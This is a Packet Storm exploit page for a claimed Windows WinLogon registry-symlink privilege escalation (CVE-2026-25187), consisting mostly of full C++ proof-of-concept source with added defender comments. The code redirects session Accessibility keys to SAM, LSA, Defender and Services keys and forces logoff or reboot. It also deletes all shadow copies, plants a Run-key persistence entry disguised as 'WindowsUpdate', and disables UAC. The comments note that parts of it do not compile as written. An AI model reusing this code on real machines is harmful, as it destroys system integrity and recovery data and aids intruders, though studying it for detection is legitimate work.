PACKETSTORM 7.8 HIGH

📄 Microsoft WinLogon Registry Deletion / Privilege Escalation_PACKETSTORM:219937

7.8 / 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise. The exploit is built around abusing Registry symbolic links...

Basic Information

ID PACKETSTORM:219937
Published Apr 28, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================

[+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
The exploit is built around abusing registry symbolic links: a per-session Accessibility key, which is processed during user logoff or session transitions, is redirected so that it points at sensitive system keys.

[+] POC :

#include <Windows.h>
#include <comdef.h>
#include <stdio.h>
#include <vector>
#include <string>
#include <map>
#include <thread>
#include <chrono>
#include <sddl.h>
#include <winternl.h>
#include <aclapi.h>
#include <lm.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "netapi32.lib")
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)

// Hand-declared prototypes for the native (ntdll) registry routines used
// below; the public SDK headers do not expose the Nt*Key calls. winternl.h
// (included above) also declares the two Rtl* routines, so the prototypes
// here must agree with it. No import library for ntdll is named in the
// #pragma comment lines above.
extern "C" {
// Creates or opens a key. CreateOptions is where the exploit passes
// INTERNAL_REG_OPTION_CREATE_LINK (0x2, the SDK's REG_OPTION_CREATE_LINK
// value) to create a link key instead of an ordinary one.
NTSTATUS NTAPI NtCreateKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);

// Opens a key; the listing always passes OpenOptions = 0 and selects the
// link object itself via OBJ_OPENLINK in ObjectAttributes instead.
NTSTATUS NTAPI NtOpenKeyEx(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG OpenOptions
);

// Writes a value; used here with Type = REG_LINK to store the target of a
// link key under the reserved value name "SymbolicLinkValue".
NTSTATUS NTAPI NtSetValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
ULONG TitleIndex,
ULONG Type,
PVOID Data,
ULONG DataSize
);

// Marks the key referenced by KeyHandle for deletion.
NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
// Declared but not referenced anywhere in this listing.
NTSTATUS NTAPI NtOpenKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
);

// NTSTATUS -> Win32 error code, used to feed SetLastError() on failure.
NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
// Fills a UNICODE_STRING that points at (does not copy) SourceString.
VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
}
// Static helpers for addressing the registry through its native
// object-manager namespace (\Registry\Machine, \Registry\User\<SID>, ...)
// and for creating / removing registry symbolic links (REG_LINK keys).
class RegistryUtils {
public:
// Returns the current process token's user SID in string form
// ("S-1-5-21-..."), or an empty string on any failure. Only used by
// RegPathToNative() to expand "HKCU\" into \Registry\User\<SID>\.
static std::wstring GetUserSid() {
HANDLE hToken = nullptr;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
return L"";

// First call only reports the required size; the second call fills the buffer.
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);

std::vector<BYTE> buffer(dwSize);
if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
CloseHandle(hToken);
return L"";
}

PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
LPWSTR lpSid = nullptr;

if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
CloseHandle(hToken);
return L"";
}

// The SID string is allocated by the API and must be released with LocalFree.
std::wstring sid(lpSid);
LocalFree(lpSid);
CloseHandle(hToken);

return sid;
}

// Translates a Win32-style path ("HKLM\...", "HKU\...", "HKCU\...",
// "HKCR\...") into the \Registry\... object path the Nt* routines expect.
// A path that is empty or already starts with '\' is returned unchanged;
// any other unrecognised prefix yields an empty string, which every
// caller treats as "invalid path".
static std::wstring RegPathToNative(const std::wstring& path) {
std::wstring regpath = L"\\Registry\\";

if (path.empty() || path[0] == L'\\')
return path;

if (path.find(L"HKLM\\") == 0) {
return regpath + L"Machine\\" + path.substr(5);
}
else if (path.find(L"HKU\\") == 0) {
return regpath + L"User\\" + path.substr(4);
}
else if (path.find(L"HKCU\\") == 0) {
// HKCU is a view of HKU\<current user SID>.
return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
}
else if (path.find(L"HKCR\\") == 0) {
// Only the machine half of HKCR is mapped; the per-user Classes overlay is ignored.
return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
}

return L"";
}

// Creates a registry symbolic link key at `symlink` whose target is
// `target` (both Win32-style paths). Any existing link at that path is
// removed first. Mechanically: NtCreateKey with REG_OPTION_CREATE_LINK,
// then a REG_LINK value named "SymbolicLinkValue" holding the native
// target path. `isVolatile` selects REG_OPTION_VOLATILE (discarded at
// reboot) versus REG_OPTION_NON_VOLATILE (persisted in the hive).
// On failure the NTSTATUS is mapped to a Win32 code via SetLastError so
// callers can print GetLastError().
// Defender note: creating a link key needs write access to its parent
// key; for the HKLM paths used in this listing that normally means an
// already-elevated token. The artefact to audit for is a REG_LINK value
// named "SymbolicLinkValue" appearing under a key that should not be a
// link (e.g. Sysmon Event ID 12/13, or Windows 4657 with a SACL set).
static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
std::wstring nativeSymlink = RegPathToNative(symlink);
std::wstring nativeTarget = RegPathToNative(target);

if (nativeSymlink.empty() || nativeTarget.empty())
return false;

printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
// Best-effort removal of a stale link at the same path; result ignored.
DeleteRegistrySymlink(symlink);

UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());

OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

HANDLE hKey = nullptr;
ULONG disposition = 0;

ULONG options = INTERNAL_REG_OPTION_CREATE_LINK |
(isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);

NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);

if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}

UNICODE_STRING valueName;
RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");

// Data length is in bytes and deliberately excludes the terminating NUL.
status = NtSetValueKey(hKey, &valueName, 0, REG_LINK,
(PVOID)nativeTarget.c_str(),
nativeTarget.length() * sizeof(WCHAR));

// A key handle from NtCreateKey is an ordinary kernel handle; CloseHandle is valid.
CloseHandle(hKey);

if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}

printf("[+] Symlink created successfully\n");
return true;
}

// Deletes the link key itself rather than whatever it points at:
// OBJ_OPENLINK makes the open stop at the link object, and DELETE is the
// only access NtDeleteKey needs. OpenOptions is passed as 0; the
// INTERNAL_REG_OPTION_OPEN_LINK macro defined above is not used here.
// Return value: true when the key could not be opened at all (treated
// as "nothing to delete") or was deleted; false only when the open
// succeeded and NtDeleteKey then failed. A path RegPathToNative cannot
// map returns false.
static bool DeleteRegistrySymlink(const std::wstring& symlink) {
std::wstring nativeSymlink = RegPathToNative(symlink);
if (nativeSymlink.empty())
return false;

UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());

OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);

HANDLE hKey = nullptr;
NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);

// Open failure (typically "not found") is reported as success.
if (status != 0) {
return true;
}

status = NtDeleteKey(hKey);
CloseHandle(hKey);

return status == 0;
}

// Recursively deletes every value and subkey under rootKey\subKey and
// then the key itself. Not referenced anywhere else in this listing; the
// exploit class calls RegDeleteTreeW instead.
// The open requests KEY_READ | KEY_SET_VALUE; child keys are deleted via
// rootKey rather than through this handle.
static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
HKEY hKey = nullptr;
if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
return false;
}
DWORD index = 0;
WCHAR valueName[256];
DWORD valueNameSize = 256;

// Deleting shifts the remaining entries down, so each successful pass
// re-enumerates at the same index (index++ then index--). A name longer
// than the 256-WCHAR buffer makes RegEnumValueW return ERROR_MORE_DATA,
// which ends the loop early and leaves the remaining values in place.
while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
RegDeleteValueW(hKey, valueName);
valueNameSize = 256;
index--;
}
index = 0;
WCHAR subKeyName[256];
DWORD subKeyNameSize = 256;

// Same enumerate-delete-rewind pattern for subkeys; each child is
// removed by a recursive call on its full path. The recursive result is ignored.
while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
std::wstring fullPath = subKey + L"\\" + subKeyName;
DeleteRegistryTreeManual(rootKey, fullPath);
subKeyNameSize = 256;
index--;
}

RegCloseKey(hKey);
return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
}
};

// Orchestrates the PoC: it points a per-session Accessibility key
// (HKLM\...\Accessibility\Session<N>\ATConfig) at a sensitive HKLM key
// through a registry symlink and then forces the session to end, on the
// premise that a privileged component removes the session key at logoff
// and follows the link while doing so. Nothing in this listing verifies
// that premise.
// Defender notes, limited to what the code visibly does:
//  - Every write target is under HKLM and is opened with KEY_ALL_ACCESS
//    or KEY_SET_VALUE; those opens normally require an already-elevated
//    token, and by default only SYSTEM has access to HKLM\SAM and
//    HKLM\SECURITY, so several entries in m_targets would fail for an
//    administrator as well.
//  - Durable artefacts: a REG_DWORD "exploit_marker" = 0xDEADBEEF on each
//    prepared target; a REG_LINK key at ...\Accessibility\Session<N>\ATConfig;
//    "vssadmin delete shadows /all /quiet" spawned through cmd.exe; an
//    HKCU\...\Run value named "WindowsUpdate"; and a forced logoff/reboot.
class WinLogonEoPExploit {
private:
// Link location (Win32-style path). Assigned ONLY in ExploitMultipleTargets();
// it is empty after construction.
std::wstring m_sessionPath;
// (label, HKLM path) pairs; wmain selects them by index.
std::vector<std::pair<std::wstring, std::wstring>> m_targets;
// When true, ExploitMultipleTargets() calls AddPersistence() first.
bool m_persistentMode;

// Fixed target list. Order matters because wmain indexes into it by menu
// choice. The second label is written with a leading space (" defender")
// exactly as in the original.
void InitializeTargets() {

m_targets = {
{L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
{L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
{L"security_policies", L"HKLM\\SECURITY\\Policy"},
{L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
{L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
{L"cached_creds", L"HKLM\\SECURITY\\Cache"},
{L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
{L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
{L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
{L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
{L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
{L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
};
}

// Builds "HKLM\...\Accessibility\Session<id>\ATConfig" for the calling
// process's session. The return value of ProcessIdToSessionId is not
// checked; if it fails, sessionId stays 0. A DWORD is formatted with %d.
std::wstring BuildSessionPath() {
DWORD sessionId = 0;
ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);

wchar_t path[512];
swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig",
sessionId);
return std::wstring(path);
}

// Ensures the target key exists (RegCreateKeyExW under HKLM with
// KEY_ALL_ACCESS, i.e. an elevated operation) and stamps it with a
// REG_DWORD "exploit_marker" = 0xDEADBEEF. Only a path RegPathToNative
// cannot map returns false; a failed RegCreateKeyExW (e.g. access
// denied) still returns true. The native path is computed but otherwise unused.
// Defender note: "exploit_marker" is a persistent forensic indicator on
// every key this PoC touched.
bool PrepareRegistryTarget(const std::wstring& targetPath) {
printf("[*] Preparing target: %ls\n", targetPath.c_str());

std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
if (nativeTarget.empty()) {
printf("[!] Invalid target path\n");
return false;
}

HKEY hKey = nullptr;
std::wstring cleanPath = targetPath;

if (cleanPath.find(L"HKLM\\") == 0) {
cleanPath = cleanPath.substr(5);
}

if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
&hKey, nullptr) == ERROR_SUCCESS) {
DWORD dummy = 0xDEADBEEF;
RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD,
(BYTE*)&dummy, sizeof(dummy));
RegCloseKey(hKey);
printf("[+] Target key created/verified\n");
}

return true;
}

// Removes whatever currently sits at the session ATConfig path
// (RegDeleteTreeW, result ignored) and replaces it with a VOLATILE
// symlink to targetPath. Depends on m_sessionPath having been set.
// NOTE(review): when m_sessionPath is still empty (the single-target
// route from wmain), pathWithoutHKLM is "" and the call becomes
// RegDeleteTreeW(HKEY_LOCAL_MACHINE, L""); that may attempt to delete
// everything under HKLM that the token is allowed to delete — confirm
// against the API's handling of an empty subkey. The subsequent
// CreateRegistrySymlink("", ...) then fails because RegPathToNative
// returns the empty path unchanged.
bool CreateMaliciousSymlink(const std::wstring& targetPath) {
printf("\n[*] Creating malicious registry symlink...\n");

std::wstring pathWithoutHKLM = m_sessionPath;
if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
pathWithoutHKLM = pathWithoutHKLM.substr(5);
}

RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());

if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
printf("[!] Failed to create symlink: %d\n", GetLastError());
return false;
}

return true;
}

// Ends the interactive session, trying in this order:
//  1. ExitWindowsEx(EWX_LOGOFF | EWX_FORCE): forced logoff, applications
//     get no chance to save state.
//  2. InitiateSystemShutdownExW(..., bForceAppsClosed = TRUE,
//     bRebootAfterShutdown = TRUE, ...): this is a forced REBOOT after a
//     5-second countdown, not a logoff, despite the message printed.
//  3. Enable SeShutdownPrivilege (AdjustTokenPrivileges result unchecked)
//     and retry ExitWindowsEx.
// Defender note: the forced logoff or reboot is the most visible effect;
// the shutdown path is normally recorded in the System log (event 1074)
// together with the initiating process and the reason string.
bool TriggerLogout() {
printf("\n[*] Triggering user logout...\n");

BOOL result = FALSE;

result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
if (result) {
printf("[+] Logout initiated via ExitWindowsEx\n");
return true;
}

result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
5, TRUE, TRUE,
SHTDN_REASON_MAJOR_APPLICATION);
if (result) {
printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
return true;
}
HANDLE hToken = nullptr;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
}
CloseHandle(hToken);
}

result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);

return result != FALSE;
}

// Writes LastKnownGoodEnabled = 1 under Session Manager\Configuration
// Manager (the value written is 1, although the local is named
// "disable"), then deletes all Volume Shadow Copies by running vssadmin
// through system(), i.e. via cmd.exe. Neither result is checked.
// Defender note: "vssadmin delete shadows /all /quiet" is one of the
// most widely monitored ransomware-style indicators; process-creation
// telemetry (Windows 4688 / Sysmon Event ID 1) on vssadmin.exe with that
// command line is the detection point. It also removes the snapshots an
// administrator would use to roll the registry hives back.
void DisableRecoveryMechanisms() {

printf("[*] Disabling recovery mechanisms...\n");

HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 1;
RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD,
(BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
}

system("vssadmin delete shadows /all /quiet > nul 2>&1");
}

public:
// persistentMode = true makes ExploitMultipleTargets() register the
// executable for autostart before doing anything else. m_sessionPath is
// left empty by the constructor.
WinLogonEoPExploit(bool persistentMode = false)
: m_persistentMode(persistentMode) {
InitializeTargets();
}

// Prepare -> symlink -> logoff for one (label, path) pair. Uses
// m_sessionPath as the link location, which is only assigned in
// ExploitMultipleTargets(); see the note on CreateMaliciousSymlink for
// what happens when it is still empty.
bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
printf("\n=== Attacking target: %ls ===\n", targetName.c_str());

if (!PrepareRegistryTarget(targetPath))
return false;

if (!CreateMaliciousSymlink(targetPath))
return false;

if (!TriggerLogout()) {
printf("[!] Failed to trigger logout\n");
return false;
}

return true;
}

// "Mass" mode: sets m_sessionPath, clears any stale link, optionally adds
// persistence, disables recovery, then loops over m_targets creating a
// link for each entry. Every iteration reuses the same link path and
// removes the previous link first (both here and inside
// CreateRegistrySymlink), so only the link to the LAST entry
// ("critical_services" -> ...\Services) still exists when TriggerLogout()
// runs. The result of TriggerLogout() is ignored; the method always
// returns true.
bool ExploitMultipleTargets() {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - WinLogon EoP Exploit\n");
printf(" Registry Deletion to SYSTEM\n");
printf("========================================\n\n");

m_sessionPath = BuildSessionPath();
printf("[*] Session path: %ls\n", m_sessionPath.c_str());

RegistryUtils::DeleteRegistrySymlink(m_sessionPath);

if (m_persistentMode) {
AddPersistence();
}

DisableRecoveryMechanisms();

printf("\n[*] Available targets:\n");
for (size_t i = 0; i < m_targets.size(); i++) {
printf(" [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
}

printf("\n[*] Targeting all critical keys for maximum impact...\n");

for (const auto& target : m_targets) {

RegistryUtils::DeleteRegistrySymlink(m_sessionPath);

if (CreateMaliciousSymlink(target.second)) {
printf("[+] Symlink created for %ls\n", target.first.c_str());

Sleep(100);
}
}

printf("\n[*] Triggering final logout for mass deletion...\n");
TriggerLogout();

return true;
}

// Registers this executable's path under HKCU\...\Run as "WindowsUpdate"
// so it starts at every logon of the current user. Only reached when
// m_persistentMode is set. GetModuleFileNameW's return is not checked.
// Defender note: a Run value whose name imitates Windows Update but
// whose data points at this PoC's executable is a classic autostart
// indicator (Sysmon Event ID 13 on the Run key, Autoruns).
void AddPersistence() {
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {

wchar_t path[MAX_PATH];
GetModuleFileNameW(nullptr, path, MAX_PATH);

RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ,
(BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);

printf("[+] Persistence added to HKCU\\Run\n");
}
}

// Same link-per-iteration pattern as ExploitMultipleTargets() over five
// additional HKLM paths; again only the last link (...\Policies\Explorer)
// survives the loop. Relies on m_sessionPath having been set by
// ExploitMultipleTargets() (wmain calls them in that order). Does not
// trigger a logoff itself and always returns true.
bool CreateMassiveRegistryCorruption() {

printf("\n[*] Creating massive registry corruption...\n");

std::vector<std::wstring> extraTargets = {
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
};

for (const auto& target : extraTargets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);

if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
printf("[+] Corruption symlink created for: %ls\n", target.c_str());
Sleep(50);
}
}

return true;
}
};

// Despite the class name, neither method escalates privileges: both
// open HKLM keys for writing, which already requires an elevated token.
class PrivilegeEscalation {
public:
// Sets EnableLUA = 0 and ConsentPromptBehaviorAdmin = 0 under
// HKLM\...\Policies\System, which turns UAC off at the next reboot
// (ConsentPromptBehaviorAdmin = 0 means "elevate without prompting").
// Returns false if the key cannot be opened with KEY_SET_VALUE; the
// RegSetValueExW results are not checked.
// Defender note: EnableLUA = 0 is one of the most commonly monitored
// registry changes (Sysmon Event ID 13 / Windows 4657) and is flagged
// by most endpoint products and hardening baselines.
static bool DisableUAC() {
printf("[*] Disabling UAC...\n");

HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {

DWORD disable = 0;
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));

RegCloseKey(hKey);
printf("[+] UAC disabled (requires reboot)\n");
return true;
}

return false;
}

// Opens HKLM\SECURITY\Policy\Privileges with KEY_SET_VALUE and closes it
// again without writing anything, so it grants nothing; the return value
// only reports whether the open succeeded. Not called anywhere in this
// listing.
static bool GrantDebugPrivileges() {
printf("[*] Granting debug privileges...\n");

HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SECURITY\\Policy\\Privileges",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegCloseKey(hKey);
return true;
}

return false;
}
};

// Entry point. Recognised flags: --mass, --persist, --target N, --help.
// The help text also lists "--disable-uac", but no branch below parses
// it; UAC is only touched when menu choice 0 is selected. A y/N prompt
// precedes any registry activity.
int wmain(int argc, wchar_t* argv[]) {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - Critical EoP Exploit\n");
printf(" WinLogon Registry Deletion to SYSTEM\n");
printf("========================================\n\n");

bool massDeletion = false;
bool persistent = false;
int targetIndex = -1;

for (int i = 1; i < argc; i++) {
if (_wcsicmp(argv[i], L"--mass") == 0) {
massDeletion = true;
}
else if (_wcsicmp(argv[i], L"--persist") == 0) {
persistent = true;
}
else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
// _wtoi returns 0 for non-numeric input, which maps to menu choice 0.
targetIndex = _wtoi(argv[++i]);
}
else if (_wcsicmp(argv[i], L"--help") == 0) {
// argv[0] is a wide string but is printed with the narrow %s conversion.
printf("Usage: %s [options]\n", argv[0]);
printf("Options:\n");
printf(" --mass Mass delete multiple critical keys\n");
printf(" --persist Add persistence to startup\n");
printf(" --target N Attack specific target by index\n");
printf(" --disable-uac Disable UAC after deletion\n");
printf("\nWARNING: This exploit will cause system instability!\n");
return 0;
}
}

printf("[!] WARNING: This exploit will delete critical registry keys!\n");
printf("[!] System may become UNBOOTABLE or severely damaged.\n");
printf("[!] Continue? (y/N): ");

// Anything other than 'y'/'Y' (including EOF) aborts.
wint_t ch = towlower(getwchar());
if (ch != L'y') {
printf("[*] Exploit aborted.\n");
return 0;
}

WinLogonEoPExploit exploit(persistent);

bool success = false;

if (massDeletion) {
// ExploitMultipleTargets() sets the session path that
// CreateMassiveRegistryCorruption() then reuses.
printf("\n[*] Running mass deletion mode...\n");
success = exploit.ExploitMultipleTargets();
exploit.CreateMassiveRegistryCorruption();
} else {
// Menu labels do not line up with m_targets beyond index 5: choice 6
// selects "ci_policies" (...\CI\Policy) and choice 7 selects
// "code_integrity" (...\DeviceGuard), not Boot Configuration. Entries
// 8-11 of m_targets are unreachable from this menu.
printf("\n[*] Available targets:\n");
printf(" 0 - UAC Bypass (Disable UAC)\n");
printf(" 1 - Windows Defender\n");
printf(" 2 - Security Policies\n");
printf(" 3 - LSA Configuration\n");
printf(" 4 - SAM (Password Hashes)\n");
printf(" 5 - Cached Credentials\n");
printf(" 6 - Code Integrity\n");
printf(" 7 - Boot Configuration (DoS)\n");
printf(" 8 - ALL (Mass Deletion)\n");

int choice = targetIndex;
if (choice == -1) {
// wscanf_s's result is not checked; non-numeric input leaves choice
// at -1, so no branch below runs and success stays false.
printf("\n[*] Select target (0-8): ");
wscanf_s(L"%d", &choice);
}

if (choice == 8) {
success = exploit.ExploitMultipleTargets();
} else if (choice >= 0 && choice < 8) {
// m_targets is declared in the private section of WinLogonEoPExploit,
// so this access does not compile as written. The single-target route
// also runs with an empty m_sessionPath (see CreateMaliciousSymlink).
auto& target = exploit.m_targets[choice];
success = exploit.ExploitSingleTarget(target.first, target.second);

if (choice == 0) {
PrivilegeEscalation::DisableUAC();
}
}
}

if (success) {
printf("\n[+] Exploit triggered! System will logout now.\n");
printf("[*] After login, check if target registry keys are deleted.\n");
Sleep(2000);
} else {
printf("\n[!] Exploit failed. Try running again or use different target.\n");
}

return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
